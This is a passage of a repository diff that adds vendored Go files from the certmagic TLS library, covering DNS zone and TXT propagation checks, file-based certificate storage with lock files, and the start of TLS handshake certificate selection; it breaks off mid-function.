RSA2048 = KeyType("rsa2048")
|
||||
RSA4096 = KeyType("rsa4096")
|
||||
RSA8192 = KeyType("rsa8192")
|
||||
)
|
340
vendor/github.com/caddyserver/certmagic/dnsutil.go
generated
vendored
Normal file
340
vendor/github.com/caddyserver/certmagic/dnsutil.go
generated
vendored
Normal file
@ -0,0 +1,340 @@
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"errors"
|
||||
"fmt"
|
||||
"net"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
)
|
||||
|
||||
// Code in this file adapted from go-acme/lego, July 2020:
|
||||
// https://github.com/go-acme/lego
|
||||
// by Ludovic Fernandez and Dominik Menke
|
||||
//
|
||||
// It has been modified.
|
||||
|
||||
// findZoneByFQDN determines the zone apex for the given fqdn by recursing
|
||||
// up the domain labels until the nameserver returns a SOA record in the
|
||||
// answer section.
|
||||
func findZoneByFQDN(fqdn string, nameservers []string) (string, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
soa, err := lookupSoaByFqdn(fqdn, nameservers)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
return soa.zone, nil
|
||||
}
|
||||
|
||||
func lookupSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
|
||||
fqdnSOACacheMu.Lock()
|
||||
defer fqdnSOACacheMu.Unlock()
|
||||
|
||||
// prefer cached version if fresh
|
||||
if ent := fqdnSOACache[fqdn]; ent != nil && !ent.isExpired() {
|
||||
return ent, nil
|
||||
}
|
||||
|
||||
ent, err := fetchSoaByFqdn(fqdn, nameservers)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// save result to cache, but don't allow
|
||||
// the cache to grow out of control
|
||||
if len(fqdnSOACache) >= 1000 {
|
||||
for key := range fqdnSOACache {
|
||||
delete(fqdnSOACache, key)
|
||||
break
|
||||
}
|
||||
}
|
||||
fqdnSOACache[fqdn] = ent
|
||||
|
||||
return ent, nil
|
||||
}
|
||||
|
||||
func fetchSoaByFqdn(fqdn string, nameservers []string) (*soaCacheEntry, error) {
|
||||
var err error
|
||||
var in *dns.Msg
|
||||
|
||||
labelIndexes := dns.Split(fqdn)
|
||||
for _, index := range labelIndexes {
|
||||
domain := fqdn[index:]
|
||||
|
||||
in, err = dnsQuery(domain, dns.TypeSOA, nameservers, true)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
if in == nil {
|
||||
continue
|
||||
}
|
||||
|
||||
switch in.Rcode {
|
||||
case dns.RcodeSuccess:
|
||||
// Check if we got a SOA RR in the answer section
|
||||
if len(in.Answer) == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
// CNAME records cannot/should not exist at the root of a zone.
|
||||
// So we skip a domain when a CNAME is found.
|
||||
if dnsMsgContainsCNAME(in) {
|
||||
continue
|
||||
}
|
||||
|
||||
for _, ans := range in.Answer {
|
||||
if soa, ok := ans.(*dns.SOA); ok {
|
||||
return newSoaCacheEntry(soa), nil
|
||||
}
|
||||
}
|
||||
case dns.RcodeNameError:
|
||||
// NXDOMAIN
|
||||
default:
|
||||
// Any response code other than NOERROR and NXDOMAIN is treated as error
|
||||
return nil, fmt.Errorf("unexpected response code '%s' for %s", dns.RcodeToString[in.Rcode], domain)
|
||||
}
|
||||
}
|
||||
|
||||
return nil, fmt.Errorf("could not find the start of authority for %s%s", fqdn, formatDNSError(in, err))
|
||||
}
|
||||
|
||||
// dnsMsgContainsCNAME checks for a CNAME answer in msg
|
||||
func dnsMsgContainsCNAME(msg *dns.Msg) bool {
|
||||
for _, ans := range msg.Answer {
|
||||
if _, ok := ans.(*dns.CNAME); ok {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func dnsQuery(fqdn string, rtype uint16, nameservers []string, recursive bool) (*dns.Msg, error) {
|
||||
m := createDNSMsg(fqdn, rtype, recursive)
|
||||
var in *dns.Msg
|
||||
var err error
|
||||
for _, ns := range nameservers {
|
||||
in, err = sendDNSQuery(m, ns)
|
||||
if err == nil && len(in.Answer) > 0 {
|
||||
break
|
||||
}
|
||||
}
|
||||
return in, err
|
||||
}
|
||||
|
||||
func createDNSMsg(fqdn string, rtype uint16, recursive bool) *dns.Msg {
|
||||
m := new(dns.Msg)
|
||||
m.SetQuestion(fqdn, rtype)
|
||||
m.SetEdns0(4096, false)
|
||||
if !recursive {
|
||||
m.RecursionDesired = false
|
||||
}
|
||||
return m
|
||||
}
|
||||
|
||||
func sendDNSQuery(m *dns.Msg, ns string) (*dns.Msg, error) {
|
||||
udp := &dns.Client{Net: "udp", Timeout: dnsTimeout}
|
||||
in, _, err := udp.Exchange(m, ns)
|
||||
// two kinds of errors we can handle by retrying with TCP:
|
||||
// truncation and timeout; see https://github.com/caddyserver/caddy/issues/3639
|
||||
truncated := in != nil && in.Truncated
|
||||
timeoutErr := err != nil && strings.Contains(err.Error(), "timeout")
|
||||
if truncated || timeoutErr {
|
||||
tcp := &dns.Client{Net: "tcp", Timeout: dnsTimeout}
|
||||
in, _, err = tcp.Exchange(m, ns)
|
||||
}
|
||||
return in, err
|
||||
}
|
||||
|
||||
func formatDNSError(msg *dns.Msg, err error) string {
|
||||
var parts []string
|
||||
if msg != nil {
|
||||
parts = append(parts, dns.RcodeToString[msg.Rcode])
|
||||
}
|
||||
if err != nil {
|
||||
parts = append(parts, err.Error())
|
||||
}
|
||||
if len(parts) > 0 {
|
||||
return ": " + strings.Join(parts, " ")
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
// soaCacheEntry holds a cached SOA record (only selected fields)
|
||||
type soaCacheEntry struct {
|
||||
zone string // zone apex (a domain name)
|
||||
primaryNs string // primary nameserver for the zone apex
|
||||
expires time.Time // time when this cache entry should be evicted
|
||||
}
|
||||
|
||||
func newSoaCacheEntry(soa *dns.SOA) *soaCacheEntry {
|
||||
return &soaCacheEntry{
|
||||
zone: soa.Hdr.Name,
|
||||
primaryNs: soa.Ns,
|
||||
expires: time.Now().Add(time.Duration(soa.Refresh) * time.Second),
|
||||
}
|
||||
}
|
||||
|
||||
// isExpired checks whether a cache entry should be considered expired.
|
||||
func (cache *soaCacheEntry) isExpired() bool {
|
||||
return time.Now().After(cache.expires)
|
||||
}
|
||||
|
||||
// systemOrDefaultNameservers attempts to get system nameservers from the
|
||||
// resolv.conf file given by path before falling back to hard-coded defaults.
|
||||
func systemOrDefaultNameservers(path string, defaults []string) []string {
|
||||
config, err := dns.ClientConfigFromFile(path)
|
||||
if err != nil || len(config.Servers) == 0 {
|
||||
return defaults
|
||||
}
|
||||
return config.Servers
|
||||
}
|
||||
|
||||
// populateNameserverPorts ensures that all nameservers have a port number.
|
||||
func populateNameserverPorts(servers []string) {
|
||||
for i := range servers {
|
||||
_, port, _ := net.SplitHostPort(servers[i])
|
||||
if port == "" {
|
||||
servers[i] = net.JoinHostPort(servers[i], "53")
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// checkDNSPropagation checks if the expected TXT record has been propagated to all authoritative nameservers.
|
||||
func checkDNSPropagation(fqdn, value string, resolvers []string) (bool, error) {
|
||||
if !strings.HasSuffix(fqdn, ".") {
|
||||
fqdn += "."
|
||||
}
|
||||
|
||||
// Initial attempt to resolve at the recursive NS
|
||||
r, err := dnsQuery(fqdn, dns.TypeTXT, resolvers, true)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
if r.Rcode == dns.RcodeSuccess {
|
||||
fqdn = updateDomainWithCName(r, fqdn)
|
||||
}
|
||||
|
||||
authoritativeNss, err := lookupNameservers(fqdn, resolvers)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
return checkAuthoritativeNss(fqdn, value, authoritativeNss)
|
||||
}
|
||||
|
||||
// checkAuthoritativeNss queries each of the given nameservers for the expected TXT record.
|
||||
func checkAuthoritativeNss(fqdn, value string, nameservers []string) (bool, error) {
|
||||
for _, ns := range nameservers {
|
||||
r, err := dnsQuery(fqdn, dns.TypeTXT, []string{net.JoinHostPort(ns, "53")}, false)
|
||||
if err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
if r.Rcode != dns.RcodeSuccess {
|
||||
if r.Rcode == dns.RcodeNameError {
|
||||
// if Present() succeeded, then it must show up eventually, or else
|
||||
// something is really broken in the DNS provider or their API;
|
||||
// no need for error here, simply have the caller try again
|
||||
return false, nil
|
||||
}
|
||||
return false, fmt.Errorf("NS %s returned %s for %s", ns, dns.RcodeToString[r.Rcode], fqdn)
|
||||
}
|
||||
|
||||
var found bool
|
||||
for _, rr := range r.Answer {
|
||||
if txt, ok := rr.(*dns.TXT); ok {
|
||||
record := strings.Join(txt.Txt, "")
|
||||
if record == value {
|
||||
found = true
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if !found {
|
||||
return false, nil
|
||||
}
|
||||
}
|
||||
|
||||
return true, nil
|
||||
}
|
||||
|
||||
// lookupNameservers returns the authoritative nameservers for the given fqdn.
|
||||
func lookupNameservers(fqdn string, resolvers []string) ([]string, error) {
|
||||
var authoritativeNss []string
|
||||
|
||||
zone, err := findZoneByFQDN(fqdn, resolvers)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("could not determine the zone: %w", err)
|
||||
}
|
||||
|
||||
r, err := dnsQuery(zone, dns.TypeNS, resolvers, true)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
for _, rr := range r.Answer {
|
||||
if ns, ok := rr.(*dns.NS); ok {
|
||||
authoritativeNss = append(authoritativeNss, strings.ToLower(ns.Ns))
|
||||
}
|
||||
}
|
||||
|
||||
if len(authoritativeNss) > 0 {
|
||||
return authoritativeNss, nil
|
||||
}
|
||||
return nil, errors.New("could not determine authoritative nameservers")
|
||||
}
|
||||
|
||||
// Update FQDN with CNAME if any
|
||||
func updateDomainWithCName(r *dns.Msg, fqdn string) string {
|
||||
for _, rr := range r.Answer {
|
||||
if cn, ok := rr.(*dns.CNAME); ok {
|
||||
if cn.Hdr.Name == fqdn {
|
||||
return cn.Target
|
||||
}
|
||||
}
|
||||
}
|
||||
return fqdn
|
||||
}
|
||||
|
||||
// recursiveNameservers are used to pre-check DNS propagation. It
|
||||
// picks user-configured nameservers (custom) OR the defaults
|
||||
// obtained from resolv.conf and defaultNameservers if none is
|
||||
// configured and ensures that all server addresses have a port value.
|
||||
func recursiveNameservers(custom []string) []string {
|
||||
var servers []string
|
||||
if len(custom) == 0 {
|
||||
servers = systemOrDefaultNameservers(defaultResolvConf, defaultNameservers)
|
||||
} else {
|
||||
servers = make([]string, len(custom))
|
||||
copy(servers, custom)
|
||||
}
|
||||
populateNameserverPorts(servers)
|
||||
return servers
|
||||
}
|
||||
|
||||
var defaultNameservers = []string{
|
||||
"8.8.8.8:53",
|
||||
"8.8.4.4:53",
|
||||
"1.1.1.1:53",
|
||||
"1.0.0.1:53",
|
||||
}
|
||||
|
||||
var dnsTimeout = 10 * time.Second
|
||||
|
||||
var (
|
||||
fqdnSOACache = map[string]*soaCacheEntry{}
|
||||
fqdnSOACacheMu sync.Mutex
|
||||
)
|
||||
|
||||
const defaultResolvConf = "/etc/resolv.conf"
|
404
vendor/github.com/caddyserver/certmagic/filestorage.go
generated
vendored
Normal file
404
vendor/github.com/caddyserver/certmagic/filestorage.go
generated
vendored
Normal file
@ -0,0 +1,404 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"io/fs"
|
||||
"log"
|
||||
"os"
|
||||
"path"
|
||||
"path/filepath"
|
||||
"runtime"
|
||||
"time"
|
||||
)
|
||||
|
||||
// FileStorage facilitates forming file paths derived from a root
|
||||
// directory. It is used to get file paths in a consistent,
|
||||
// cross-platform way or persisting ACME assets on the file system.
|
||||
// The presence of a lock file for a given key indicates a lock
|
||||
// is held and is thus unavailable.
|
||||
//
|
||||
// Locks are created atomically by relying on the file system to
|
||||
// enforce the O_EXCL flag. Acquirers that are forcefully terminated
|
||||
// will not have a chance to clean up their locks before they exit,
|
||||
// so locks may become stale. That is why, while a lock is actively
|
||||
// held, the contents of the lockfile are updated with the current
|
||||
// timestamp periodically. If another instance tries to acquire the
|
||||
// lock but fails, it can see if the timestamp within is still fresh.
|
||||
// If so, it patiently waits by polling occasionally. Otherwise,
|
||||
// the stale lockfile is deleted, essentially forcing an unlock.
|
||||
//
|
||||
// While locking is atomic, unlocking is not perfectly atomic. File
|
||||
// systems offer native atomic operations when creating files, but
|
||||
// not necessarily when deleting them. It is theoretically possible
|
||||
// for two instances to discover the same stale lock and both proceed
|
||||
// to delete it, but if one instance is able to delete the lockfile
|
||||
// and create a new one before the other one calls delete, then the
|
||||
// new lock file created by the first instance will get deleted by
|
||||
// mistake. This does mean that mutual exclusion is not guaranteed
|
||||
// to be perfectly enforced in the presence of stale locks. One
|
||||
// alternative is to lock the unlock operation by using ".unlock"
|
||||
// files; and we did this for some time, but those files themselves
|
||||
// may become stale, leading applications into infinite loops if
|
||||
// they always expect the unlock file to be deleted by the instance
|
||||
// that created it. We instead prefer the simpler solution that
|
||||
// implies imperfect mutual exclusion if locks become stale, but
|
||||
// that is probably less severe a consequence than infinite loops.
|
||||
//
|
||||
// See https://github.com/caddyserver/caddy/issues/4448 for discussion.
|
||||
// See commit 468bfd25e452196b140148928cdd1f1a2285ae4b for where we
|
||||
// switched away from using .unlock files.
|
||||
type FileStorage struct {
|
||||
Path string
|
||||
}
|
||||
|
||||
// Exists returns true if key exists in s.
|
||||
func (s *FileStorage) Exists(_ context.Context, key string) bool {
|
||||
_, err := os.Stat(s.Filename(key))
|
||||
return !errors.Is(err, fs.ErrNotExist)
|
||||
}
|
||||
|
||||
// Store saves value at key.
|
||||
func (s *FileStorage) Store(_ context.Context, key string, value []byte) error {
|
||||
filename := s.Filename(key)
|
||||
err := os.MkdirAll(filepath.Dir(filename), 0700)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
return os.WriteFile(filename, value, 0600)
|
||||
}
|
||||
|
||||
// Load retrieves the value at key.
|
||||
func (s *FileStorage) Load(_ context.Context, key string) ([]byte, error) {
|
||||
return os.ReadFile(s.Filename(key))
|
||||
}
|
||||
|
||||
// Delete deletes the value at key.
|
||||
func (s *FileStorage) Delete(_ context.Context, key string) error {
|
||||
return os.Remove(s.Filename(key))
|
||||
}
|
||||
|
||||
// List returns all keys that match prefix.
|
||||
func (s *FileStorage) List(ctx context.Context, prefix string, recursive bool) ([]string, error) {
|
||||
var keys []string
|
||||
walkPrefix := s.Filename(prefix)
|
||||
|
||||
err := filepath.Walk(walkPrefix, func(fpath string, info os.FileInfo, err error) error {
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if info == nil {
|
||||
return fmt.Errorf("%s: file info is nil", fpath)
|
||||
}
|
||||
if fpath == walkPrefix {
|
||||
return nil
|
||||
}
|
||||
if ctxErr := ctx.Err(); ctxErr != nil {
|
||||
return ctxErr
|
||||
}
|
||||
|
||||
suffix, err := filepath.Rel(walkPrefix, fpath)
|
||||
if err != nil {
|
||||
return fmt.Errorf("%s: could not make path relative: %v", fpath, err)
|
||||
}
|
||||
keys = append(keys, path.Join(prefix, suffix))
|
||||
|
||||
if !recursive && info.IsDir() {
|
||||
return filepath.SkipDir
|
||||
}
|
||||
return nil
|
||||
})
|
||||
|
||||
return keys, err
|
||||
}
|
||||
|
||||
// Stat returns information about key.
|
||||
func (s *FileStorage) Stat(_ context.Context, key string) (KeyInfo, error) {
|
||||
fi, err := os.Stat(s.Filename(key))
|
||||
if err != nil {
|
||||
return KeyInfo{}, err
|
||||
}
|
||||
return KeyInfo{
|
||||
Key: key,
|
||||
Modified: fi.ModTime(),
|
||||
Size: fi.Size(),
|
||||
IsTerminal: !fi.IsDir(),
|
||||
}, nil
|
||||
}
|
||||
|
||||
// Filename returns the key as a path on the file
|
||||
// system prefixed by s.Path.
|
||||
func (s *FileStorage) Filename(key string) string {
|
||||
return filepath.Join(s.Path, filepath.FromSlash(key))
|
||||
}
|
||||
|
||||
// Lock obtains a lock named by the given key. It blocks
|
||||
// until the lock can be obtained or an error is returned.
|
||||
func (s *FileStorage) Lock(ctx context.Context, key string) error {
|
||||
filename := s.lockFilename(key)
|
||||
|
||||
for {
|
||||
err := createLockfile(filename)
|
||||
if err == nil {
|
||||
// got the lock, yay
|
||||
return nil
|
||||
}
|
||||
if !os.IsExist(err) {
|
||||
// unexpected error
|
||||
return fmt.Errorf("creating lock file: %v", err)
|
||||
}
|
||||
|
||||
// lock file already exists
|
||||
|
||||
var meta lockMeta
|
||||
f, err := os.Open(filename)
|
||||
if err == nil {
|
||||
err2 := json.NewDecoder(f).Decode(&meta)
|
||||
f.Close()
|
||||
if err2 != nil {
|
||||
return fmt.Errorf("decoding lockfile contents: %w", err2)
|
||||
}
|
||||
}
|
||||
|
||||
switch {
|
||||
case os.IsNotExist(err):
|
||||
// must have just been removed; try again to create it
|
||||
continue
|
||||
|
||||
case err != nil:
|
||||
// unexpected error
|
||||
return fmt.Errorf("accessing lock file: %v", err)
|
||||
|
||||
case fileLockIsStale(meta):
|
||||
// lock file is stale - delete it and try again to obtain lock
|
||||
// (NOTE: locking becomes imperfect if lock files are stale; known solutions
|
||||
// either have potential to cause infinite loops, as in caddyserver/caddy#4448,
|
||||
// or must give up on perfect mutual exclusivity; however, these cases are rare,
|
||||
// so we prefer the simpler solution that avoids infinite loops)
|
||||
log.Printf("[INFO][%s] Lock for '%s' is stale (created: %s, last update: %s); removing then retrying: %s",
|
||||
s, key, meta.Created, meta.Updated, filename)
|
||||
if err = os.Remove(filename); err != nil { // hopefully we can replace the lock file quickly!
|
||||
if !errors.Is(err, fs.ErrNotExist) {
|
||||
return fmt.Errorf("unable to delete stale lock; deadlocked: %w", err)
|
||||
}
|
||||
}
|
||||
continue
|
||||
|
||||
default:
|
||||
// lockfile exists and is not stale;
|
||||
// just wait a moment and try again,
|
||||
// or return if context cancelled
|
||||
select {
|
||||
case <-time.After(fileLockPollInterval):
|
||||
case <-ctx.Done():
|
||||
return ctx.Err()
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Unlock releases the lock for name.
|
||||
func (s *FileStorage) Unlock(_ context.Context, key string) error {
|
||||
return os.Remove(s.lockFilename(key))
|
||||
}
|
||||
|
||||
func (s *FileStorage) String() string {
|
||||
return "FileStorage:" + s.Path
|
||||
}
|
||||
|
||||
func (s *FileStorage) lockFilename(key string) string {
|
||||
return filepath.Join(s.lockDir(), StorageKeys.Safe(key)+".lock")
|
||||
}
|
||||
|
||||
func (s *FileStorage) lockDir() string {
|
||||
return filepath.Join(s.Path, "locks")
|
||||
}
|
||||
|
||||
func fileLockIsStale(meta lockMeta) bool {
|
||||
ref := meta.Updated
|
||||
if ref.IsZero() {
|
||||
ref = meta.Created
|
||||
}
|
||||
// since updates are exactly every lockFreshnessInterval,
|
||||
// add a grace period for the actual file read+write to
|
||||
// take place
|
||||
return time.Since(ref) > lockFreshnessInterval*2
|
||||
}
|
||||
|
||||
// createLockfile atomically creates the lockfile
|
||||
// identified by filename. A successfully created
|
||||
// lockfile should be removed with removeLockfile.
|
||||
func createLockfile(filename string) error {
|
||||
err := atomicallyCreateFile(filename, true)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
go keepLockfileFresh(filename)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// keepLockfileFresh continuously updates the lock file
|
||||
// at filename with the current timestamp. It stops
|
||||
// when the file disappears (happy path = lock released),
|
||||
// or when there is an error at any point. Since it polls
|
||||
// every lockFreshnessInterval, this function might
|
||||
// not terminate until up to lockFreshnessInterval after
|
||||
// the lock is released.
|
||||
func keepLockfileFresh(filename string) {
|
||||
defer func() {
|
||||
if err := recover(); err != nil {
|
||||
buf := make([]byte, stackTraceBufferSize)
|
||||
buf = buf[:runtime.Stack(buf, false)]
|
||||
log.Printf("panic: active locking: %v\n%s", err, buf)
|
||||
}
|
||||
}()
|
||||
|
||||
for {
|
||||
time.Sleep(lockFreshnessInterval)
|
||||
done, err := updateLockfileFreshness(filename)
|
||||
if err != nil {
|
||||
log.Printf("[ERROR] Keeping lock file fresh: %v - terminating lock maintenance (lockfile: %s)", err, filename)
|
||||
return
|
||||
}
|
||||
if done {
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateLockfileFreshness updates the lock file at filename
|
||||
// with the current timestamp. It returns true if the parent
|
||||
// loop can terminate (i.e. no more need to update the lock).
|
||||
func updateLockfileFreshness(filename string) (bool, error) {
|
||||
f, err := os.OpenFile(filename, os.O_RDWR, 0644)
|
||||
if os.IsNotExist(err) {
|
||||
return true, nil // lock released
|
||||
}
|
||||
if err != nil {
|
||||
return true, err
|
||||
}
|
||||
defer f.Close()
|
||||
|
||||
// read contents
|
||||
metaBytes, err := io.ReadAll(io.LimitReader(f, 2048))
|
||||
if err != nil {
|
||||
return true, err
|
||||
}
|
||||
var meta lockMeta
|
||||
if err := json.Unmarshal(metaBytes, &meta); err != nil {
|
||||
return true, err
|
||||
}
|
||||
|
||||
// truncate file and reset I/O offset to beginning
|
||||
if err := f.Truncate(0); err != nil {
|
||||
return true, err
|
||||
}
|
||||
if _, err := f.Seek(0, io.SeekStart); err != nil {
|
||||
return true, err
|
||||
}
|
||||
|
||||
// write updated timestamp
|
||||
meta.Updated = time.Now()
|
||||
if err = json.NewEncoder(f).Encode(meta); err != nil {
|
||||
return false, err
|
||||
}
|
||||
|
||||
// sync to device; we suspect that sometimes file systems
|
||||
// (particularly AWS EFS) don't do this on their own,
|
||||
// leaving the file empty when we close it; see
|
||||
// https://github.com/caddyserver/caddy/issues/3954
|
||||
return false, f.Sync()
|
||||
}
|
||||
|
||||
// atomicallyCreateFile atomically creates the file
|
||||
// identified by filename if it doesn't already exist.
|
||||
func atomicallyCreateFile(filename string, writeLockInfo bool) error {
|
||||
// no need to check this error, we only really care about the file creation error
|
||||
_ = os.MkdirAll(filepath.Dir(filename), 0700)
|
||||
f, err := os.OpenFile(filename, os.O_CREATE|os.O_WRONLY|os.O_EXCL, 0644)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer f.Close()
|
||||
if writeLockInfo {
|
||||
now := time.Now()
|
||||
meta := lockMeta{
|
||||
Created: now,
|
||||
Updated: now,
|
||||
}
|
||||
if err := json.NewEncoder(f).Encode(meta); err != nil {
|
||||
return err
|
||||
}
|
||||
// see https://github.com/caddyserver/caddy/issues/3954
|
||||
if err := f.Sync(); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// homeDir returns the best guess of the current user's home
|
||||
// directory from environment variables. If unknown, "." (the
|
||||
// current directory) is returned instead.
|
||||
func homeDir() string {
|
||||
home := os.Getenv("HOME")
|
||||
if home == "" && runtime.GOOS == "windows" {
|
||||
drive := os.Getenv("HOMEDRIVE")
|
||||
path := os.Getenv("HOMEPATH")
|
||||
home = drive + path
|
||||
if drive == "" || path == "" {
|
||||
home = os.Getenv("USERPROFILE")
|
||||
}
|
||||
}
|
||||
if home == "" {
|
||||
home = "."
|
||||
}
|
||||
return home
|
||||
}
|
||||
|
||||
func dataDir() string {
|
||||
baseDir := filepath.Join(homeDir(), ".local", "share")
|
||||
if xdgData := os.Getenv("XDG_DATA_HOME"); xdgData != "" {
|
||||
baseDir = xdgData
|
||||
}
|
||||
return filepath.Join(baseDir, "certmagic")
|
||||
}
|
||||
|
||||
// lockMeta is written into a lock file.
|
||||
type lockMeta struct {
|
||||
Created time.Time `json:"created,omitempty"`
|
||||
Updated time.Time `json:"updated,omitempty"`
|
||||
}
|
||||
|
||||
// lockFreshnessInterval is how often to update
|
||||
// a lock's timestamp. Locks with a timestamp
|
||||
// more than this duration in the past (plus a
|
||||
// grace period for latency) can be considered
|
||||
// stale.
|
||||
const lockFreshnessInterval = 5 * time.Second
|
||||
|
||||
// fileLockPollInterval is how frequently
|
||||
// to check the existence of a lock file
|
||||
const fileLockPollInterval = 1 * time.Second
|
||||
|
||||
// Interface guard
|
||||
var _ Storage = (*FileStorage)(nil)
|
817
vendor/github.com/caddyserver/certmagic/handshake.go
generated
vendored
Normal file
817
vendor/github.com/caddyserver/certmagic/handshake.go
generated
vendored
Normal file
@ -0,0 +1,817 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto/tls"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io/fs"
|
||||
"net"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/mholt/acmez"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/crypto/ocsp"
|
||||
)
|
||||
|
||||
// GetCertificate gets a certificate to satisfy clientHello. In getting
|
||||
// the certificate, it abides the rules and settings defined in the Config
|
||||
// that matches clientHello.ServerName. It tries to get certificates in
|
||||
// this order:
|
||||
//
|
||||
// 1. Exact match in the in-memory cache
|
||||
// 2. Wildcard match in the in-memory cache
|
||||
// 3. Managers (if any)
|
||||
// 4. Storage (if on-demand is enabled)
|
||||
// 5. Issuers (if on-demand is enabled)
|
||||
//
|
||||
// This method is safe for use as a tls.Config.GetCertificate callback.
|
||||
func (cfg *Config) GetCertificate(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
|
||||
cfg.emit("tls_handshake_started", clientHello)
|
||||
|
||||
// special case: serve up the certificate for a TLS-ALPN ACME challenge
|
||||
// (https://tools.ietf.org/html/draft-ietf-acme-tls-alpn-05)
|
||||
for _, proto := range clientHello.SupportedProtos {
|
||||
if proto == acmez.ACMETLS1Protocol {
|
||||
challengeCert, distributed, err := cfg.getTLSALPNChallengeCert(clientHello)
|
||||
if err != nil {
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Error("tls-alpn challenge",
|
||||
zap.String("server_name", clientHello.ServerName),
|
||||
zap.Error(err))
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Info("served key authentication certificate",
|
||||
zap.String("server_name", clientHello.ServerName),
|
||||
zap.String("challenge", "tls-alpn-01"),
|
||||
zap.String("remote", clientHello.Conn.RemoteAddr().String()),
|
||||
zap.Bool("distributed", distributed))
|
||||
}
|
||||
return challengeCert, nil
|
||||
}
|
||||
}
|
||||
|
||||
// get the certificate and serve it up
|
||||
cert, err := cfg.getCertDuringHandshake(clientHello, true, true)
|
||||
if err == nil {
|
||||
cfg.emit("tls_handshake_completed", clientHello)
|
||||
}
|
||||
return &cert.Certificate, err
|
||||
}
|
||||
|
||||
// getCertificateFromCache gets a certificate that matches name from the in-memory
|
||||
// cache, according to the lookup table associated with cfg. The lookup then
|
||||
// points to a certificate in the Instance certificate cache.
|
||||
//
|
||||
// The name is expected to already be normalized (e.g. lowercased).
|
||||
//
|
||||
// If there is no exact match for name, it will be checked against names of
|
||||
// the form '*.example.com' (wildcard certificates) according to RFC 6125.
|
||||
// If a match is found, matched will be true. If no matches are found, matched
|
||||
// will be false and a "default" certificate will be returned with defaulted
|
||||
// set to true. If defaulted is false, then no certificates were available.
|
||||
//
|
||||
// The logic in this function is adapted from the Go standard library,
|
||||
// which is by the Go Authors.
|
||||
//
|
||||
// This function is safe for concurrent use.
|
||||
func (cfg *Config) getCertificateFromCache(hello *tls.ClientHelloInfo) (cert Certificate, matched, defaulted bool) {
|
||||
name := normalizedName(hello.ServerName)
|
||||
|
||||
if name == "" {
|
||||
// if SNI is empty, prefer matching IP address
|
||||
if hello.Conn != nil {
|
||||
addr := localIPFromConn(hello.Conn)
|
||||
cert, matched = cfg.selectCert(hello, addr)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
}
|
||||
|
||||
// fall back to a "default" certificate, if specified
|
||||
if cfg.DefaultServerName != "" {
|
||||
normDefault := normalizedName(cfg.DefaultServerName)
|
||||
cert, defaulted = cfg.selectCert(hello, normDefault)
|
||||
if defaulted {
|
||||
return
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// if SNI is specified, try an exact match first
|
||||
cert, matched = cfg.selectCert(hello, name)
|
||||
if matched {
|
||||
return
|
||||
}
|
||||
|
||||
// try replacing labels in the name with
|
||||
// wildcards until we get a match
|
||||
labels := strings.Split(name, ".")
|
||||
for i := range labels {
|
||||
labels[i] = "*"
|
||||
candidate := strings.Join(labels, ".")
|
